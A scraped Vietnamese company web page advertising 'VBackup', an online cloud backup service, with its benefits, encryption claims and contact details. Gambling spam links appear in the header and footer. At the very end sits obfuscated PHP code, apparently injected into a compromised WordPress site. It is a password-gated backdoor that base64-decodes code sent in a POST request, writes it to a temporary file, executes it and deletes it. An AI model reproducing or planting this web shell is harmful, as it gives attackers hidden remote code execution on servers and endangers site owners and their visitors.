Sao lưu dữ liệu trực tuyến - Máy Chủ Việt Nam
jeu plinko avis pin up catcasino vavada официальный jucky jet

Sao lưu dữ liệu trực tuyến

Ngày 01/05/2013 đăng bởi seo3.VS [email protected]

Giải pháp sao lưu dữ liệu ( Data Backup ), sao lưu dữ liệu trực tuyến ( Online Backup )

Lý do tại sao bạn nên sử dụng dịch vụ sao lưu và phục hồi dữ liệu trực tuyến ?

Dữ liệu hoạt động của các cá nhân, tổ chức, doanh nghiệp bao gồm các loại thông tin: thông tin khách hàng, dữ liệu kế toán, dữ liệu sản xuất, hồ sơ, hợp đồng, báo cáo, biểu mẫu, các bản thiết kế, phần mềm, video, vv…Các dữ liệu này phục vụ cho hoạt động hàng ngày của các cá nhân, tổ chức,  doanh nghiệp, và công tác báo cáo thống kê. Bất cứ sự mất mát dữ liệu nào cũng ảnh hưởng nghiêm trọng đến hoạt động, tiến độ công việc của mọi cá nhân, tổ chức, doanh nghiệp.

Sao lưu và Phục hồi dữ liệu ( Backup & Recovery ) là công việc đặc biệt quan trọng đối với các hệ thống Database. Trong trường hợp xảy ra sự cố về dữ liệu sẽ không có cách nào để khôi phục lại nếu không có kế hoạch sao lưu trước đó. Điều này đồng nghĩa với việc tê liệt toàn bộ hệ thống Database và ứng dụng kèm theo nó. Nghiêm trọng hơn, nó ảnh hưởng đến hoạt động kinh doanh và làm mất đi sự tín nhiệm của khách hàng đối với doanh nghiệp.

Mô hình tổng quan giải pháp lưu trữ trực tuyến Cloud Backup

Hiện nay đa số các doanh nghiệp đều lưu trữ dữ liệu phân tán trên ổ cứng của từng máy tính, nên nguy cơ mất dữ liệu là rất lớn do các ổ cứng của các máy tính có thể hỏng bất cứ khi nào, hoặc có thể bị virus làm hỏng dữ liệu, người sử dụng xóa nhầm, mất cắp các máy tính và thiết bị lưu trữ di động…VS Trading sẽ cung cấp cho quý khách hàng những sản phẩm sao lưu dữ liệu ( Data Backup ), sao lưu dữ liệu trực tuyến ( Online Backup ), phục hồi dữ liệu ( Data Recovery ), bảo vệ hữu hiệu nguồn dữ liệu quan trọng của quý khách hàng.

Lý do cần phải sao lưu là vô cùng thiết thực: dự phòng trước rủi ro mất mát dữ liệu. Nguy cơ mất mát thông tin trên máy tính luôn rình rập do nhiều nguyên nhân có thể gọi là thảm họa: hỏa hoạn, mất cắp, hư hỏng ổ đĩa cứng, hư hỏng máy tính, hay thậm chí vô tình xóa nhầm, vv… Công cụ sao lưu cổ điển như băng từ, CD hay DVD và ngay cả bạn đã sao lưu lên các ổ đĩa cứng di động cũng chịu cùng một mức độ rủi ro với việc lưu trữ trên máy tính cá nhân.

Intrenet tốc độ ngày càng cao, cùng với sự phát triển mạnh mẽ của các Trung tâm lưu trữ ( Data center ) tiêu chuẩn Quốc tế Tiea 3 trở lên. Đảm bảo đem đến cho người dùng ở mọi cấp độ một lực chọn lý tưởng: sao lưu dữ liệu quan trọng của mình trực tuyến và khôi phục nhanh chóng khi có thảm họa xảy ra.

VS Trading là một trong những công ty sớm triển khai xây dựng giải pháp và ứng dụng cung cấp các dịch vụ sao lưu dữ liệu trực tuyến trên nền điện toán đám mây ( Cloud Computing ) tại Việt Nam,VS Trading vừa ra mắt dịch vụ sao lưu dữ liệu trực tuyến “ VBackup – Sao lưu và Phục hồi dữ liệu trực tuyến ”.

VBackup giúp bạn sao lưu dữ liệu tự động từ một hay nhiều máy tính, không phân biệt các máy tính này ở vị trí địa lý nào và bất cứ nơi đâu, chỉ cần có kết nối Internet bạn có thể dễ dàng truy cập dữ liệu và thưc hiện sao lưu dữ liệu của nhiều máy tính lên hệ thống máy chủ Backup của chúng tôi thông qua một tài khoản duy nhất. Cơ chế bảo mật của VBackup chính là ưu điểm nổi bật của sản phẩm khi dữ liệu được mã hóa dữ liệu 128 bit hoặc 256 bit AES và SSL nên chỉ có chủ tài khoản mới có thể truy cập dữ liệu của mình. Hệ thống bảo mật kênh truyền SSL được sử dụng phổ biến để truyền dữ liệu trong các hệ thống email, thương mại điện tử, ngân hàng điện tử…

Dịch vụ VBackup là gì?

Vbackup là dịch vụ sao lưu dữ liệu trong máy tính về lưu trữ tại Trung tâm dữ liệu – Data Center củaVS Trading thông qua kết nối Internet. VBackup tự động sao lưu và bảo vệ an toàn dữ liệu, giúp khách hàng dễ dàng phục hồi nếu không may gặp sự cố mất mát dữ liệu.

Mô hình căn bản của giải pháp Vbackup

Giải pháp sao lưu Dữ liệu VBACKUP trên nền tảng điện toán đám mây củaVS Trading là gì?

Đây là dịch vụ sao lưu dữ liệu trực tuyến ứng dụng công nghệ điện toán đám mây, đáp ứng nhu cầu lưu trữ và bảo mật thông tin của người dùng cá nhân cũng như tổ chức, doanh nghiệp.

Các ứng dụng hoàn chỉnh được cung cấp cho khách hàng dưới dạng dịch vụ được khách hàng yêu cầu, khách hàng chỉ phải trả phí sử dụng theo thời gian và tính năng yêu cầu, giúp khách hàng kiểm soát chi phí liên quan đến bảo toàn dữ liệu như: bảo vệ các ứng dụng, sao lưu, lưu trữ, phục hồi dữ liệu, tái sử dụng dữ liệu.

Trên nền tảng đám mây, người dùng có thể sao lưu dữ liệu từ bất kỳ nơi nào, từ nhiều máy tính vào cùng một tài khoản duy nhất trên mạng. Khi muốn tìm dữ liệu đã sao lưu, người dùng dễ dàng truy cập từ nơi có kết nối Internet mà không phải mất công lục tìm ổ cứng rồi sau đó kết nối máy tính như cách truyền thống.

Những lợi ích của dịch vụ VBackup mang lại cho khách hàng

–          VBackup giúp khách hàng: Sao lưu và bảo vệ tốt nhất dữ liệu tại chỗ một cách linh hoạt, tự động. Kiểm soát quá trình sao lưu, khôi phục dữ liệu từ xa, hạ thấp rủi ro hoạt động và chi phí.

–          Tính linh hoạt: Khách hàng có thể tùy chọn việc triển khai một kế hoạch sao lưu, duy trì và khôi phục dữ liệu để đảm bảo được khả năng truy cập thông tin một cách liên tục, an toàn với độ sẵn sàng cùng khả năng mở rộng khi có nhu cầu. Đây cũng là mô hình hoạt động trả tiền theo thực tế sử dụng ( pay-as-you-grow ) đầu tiên dựa trên nền tảng điện toán đám mây ( Cloud Computing ).

–          Tiết kiệm chi phí: Khách hàng không cần phải đầu tư máy chủ hoặc bản quyền phần mềm và nhà cung cấp cũng giảm được chi phí. Hơn nữa khách hàng có thể giảm thiểu được nguy cơ bị mất hay rò rỉ thông tin khi dùng ổ cứng thông thường trong trường hợp cháy nổ, đột nhập, mất cắp…

–          An toàn dữ liệu: Bảo vệ dữ liệu, rút ngắn thời gian sao lưu và phục hồi dữ liệu nhằm đảm bảo tính liên tục trong quá trình sản xuất kinh doanh & cung cấp dịch vụ.

–          Kiểm soát chi phí liên quan đến bảo tòan dữ liệu như: bảo vệ các ứng dụng, sao lưu, lưu trữ và phục hồi.

–          Bảo mật tuyệt đối: Dữ liệu sao lưu được mã hóa một chiều 128 – 256-bit AES nên không ai có thể truy cập (ngoại trừ bạn).

–          Phục hồi nhanh chóng: Không may gặp sự cố, bạn chỉ cần thực hiện một vài click chuột là có thể lấy lại dữ liệu.

–          Quản trị tập trung: Vbackup cung cấp giao diện web trực quan giúp các Quản trị viên IT dễ dàng quản lý việc sao lưu của toàn bộ hạ tầng IT trong doanh nghiệp.

–          Phù hợp mọi đối tượng: Vbackup hỗ trợ laptop, desktop và server nên có thể đáp ứng mọi nhu cầu sao lưu dù bạn là Cá nhân hay Doanh nghiệp.

–          Tối ưu hóa nhân lực: Giải phóng nguồn lực IT cho những công việc ưu tiên khác.

Ưu điểm của dịch vụ Vbackup ?

1.     Tiết kiệm chi chí

–          Tiết kiệm đến hơn 40% chi phí bảo vệ, sao lưu dữ liệu so với các phương thức truyền thống.

–          Hình thức pay-as-you-grow giúp doanh nghiệp kiểm soát & dự đoán chi phí hàng tháng.

–          Không cần vốn đầu tư ban đầu.

2.     Độ tin cậy của hệ thống cao

–          Tỉ lệ sao lưu thành công lên đến 99.5%.

–          Bảo vệ dữ liệu trực tuyến (onsite backup) với tính bảo mật cao.

–          Hệ thống theo dõi và bảo vệ dữ liệu tự động 24/7

3.     Sao lưu và truy cập dữ liệu mọi lúc mọi nơi

–          Linh hoạt đối với môi trường IT không đồng nhất

–          Tự theo dõi tình trạng sử dụng qua cổng thông tin điện tử giúp tiết kiệm thời gian & chi phí quản lý.

–          Tích hợp dễ dàng với các dịch vụ khác của VDC

4.     Hệ thống và dịch vụ hỗ trợ khách hàng 24/7/365

–          Hệ thống cổng thông tin (portal) giám sát tình trạng sử dụng thông minh, tiện dụng

–          Đội ngũ chuyên gia hỗ trợ dịch vụ 24/7/365

–          Miễn phí cài đặt & phần mềm agent cho khách hàng.

So sánh sao lưu dữ liệu với Vbackup và bằng CD, USB, thiết bị lưu trữ di động khác

Hiện nay, sao lưu dữ liệu bằng CD, USB, thiết bị lưu trữ di động khác vẫn đang được sử dụng phổ biến bởi nhiều Cá nhân và tổ chức, Doanh nghiệp. Tuy vẫn giúp bảo vệ được dữ liệu phần nào, nhưng những cách sao lưu truyền thống này có nhiều điểm yếu khó khắc phục so với dịch vụ sao lưu và phục hồi dữ liệu trực tuyến:

Sao lưu dữ liệu bằng CD, USB, thiết bị lưu trữ di động khác Sao lưu dữ liệu và phục hồi với Vbackup
–          Thao tác thủ công nên dễ gây lỗi, dễ quên.

–          Tốn nhiều thời gian, công sức.

–          Điều kiện bảo quản không tốt khiến dữ liệu không an toàn.

–          Dữ liệu không được mã hóa nên dễ bị đánh cắp, rò rỉ.

–          Không tự động quản lý theo phiên bản.

–          Để phục hồi một file cần thực hiện nhiều bước, rất mất thời gian và bất tiện.

–          Hầu như không thể truy cập từ xa.

 

–          Sao lưu hoàn toàn tự động sao lưu.

–          Mã hóa 128 bit hoặc 256 bit AES giúp dữ liệu tuyệt đối bảo mật.

–          Lưu trữ trong môi trường Data Center nên rất an toàn.

–          Phục hồi mọi lúc mọi nơi chỉ với vài click chuột.

–          Quản lý theo phiên bản nên có thể phục hồi đúng file cần thiết.

–          Có các phiên bản dành riêng cho laptop/desktop và server.

–          Hỗ trợ nhiều loai dữ liệu: Office, Outlook, Active Directory, SQL Server, Exchange Server, MySQL, Oracle,…

Tính bảo mật tuyệt đối của giải pháp sao lưu và phục hồi dữ liệu trực tuyến

Tính bảo mật là yêu cầu quan trọng bậc nhất của việc sao lưu, đặc biệt là khi mà người dùng đặt sự tin cậy của mình vào nhà cung cấp dịch vụ. Dữ liệu được chọn sao lưu là những dữ liệu quan trọng, cần được bảo mật ở mức độ cao nhất.

VBackup sử dụng cơ chế mã hóa với độ an toàn cao. Tất cả dữ liệu đều được nén và mã hóa với kỹ thuật AES ( Advanced Encryption Standard ) 128 hay 256 bit, sau đó mới được gửi lên hệ thống máy chủ lưu trữ ( Online Backup Server ). Chỉ có người dùng là biết khóa mã, vì thế không có ai có thể mở dữ liệu lưu trên Server.

Kỹ thuật AES 128 hay 256 bit là phép mã hóa đã được National Institute of Standards and Technology (NIST) lựa chọn; nó là kỹ thuật mã hóa đã được chính phủ Mỹ sử dụng từ năm 2000. Cho đến nay, chưa có bất cứ báo cáo nào về việc kỹ thuật mã hóa này bị bẻ khóa.

VBackup là một sản phẩm lưu trữ trực tuyến với đầy đủ những đặc điểm ưu việt, trong đó an toàn và bảo mật là hai đặc điểm có độ ưu tiên cao nhất. Một trong những nhu cầu hàng đầu của người dùng khi tiến hành sao lưu dự phòng là quản lý được các phiên bản khác nhau của thông tin. Với VBackup, khả năng này là một tính năng mặc định.

Hỗ trợ sao lưu nhiều ứng dụng và hệ điều hành khác nhau

Nếu đang quản trị hệ thống của doanh nghiệp, với VBackup, bạn dễ dàng lựa chọn và thực hiện sao lưu thông tin của các ứng dụng MS Exchange Server hay MS SQL, My SQL.

Dịch vụ sao lưu trực tuyến Vbackup hỗ trợ nhiều hệ điều hành khác nhau, từ Windows XP/Vista/Windows 7…đến Mac OS, Linux… Bạn có thể sao lưu các dữ liệu quan trọng trên bất kỳ thư mục nào.

Chi tiết truy cập tại website http://vbackup.vnhttp://vbackup.com.vn

 

Liên hệ ngay với chúng tôi để được tư vấn và trải nghiệm các dịch vụ tốt nhất !

CÔNG TY TNHH THƯƠNG MẠI MÁY CHỦ VIỆT NAM

Trụ sở : Số 07 ngõ 43 phố Nguyễn Thị Định, Phường Trung Hoà, Quận Cầu Giấy, Thành phố Hà Nội, Việt Nam

HCM: Phòng 13.09, Lô C, Số 974A Trường Sa (Co.opmart Nhiêu Lộc), Phường 12, Quận 3, Hồ Chí Minh.

Tel: 0247303406802873038068

Email: [email protected]

Thời gian làm việc: Thứ Hai – Thứ Bảy, Sáng: 8h – 12h, Chiều: 1h30 – 5h30

.
.
.
.
Danh mục sản phẩm
024 7303 4068
jeu plinko avis pin up catcasino vavada официальный jucky jet
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}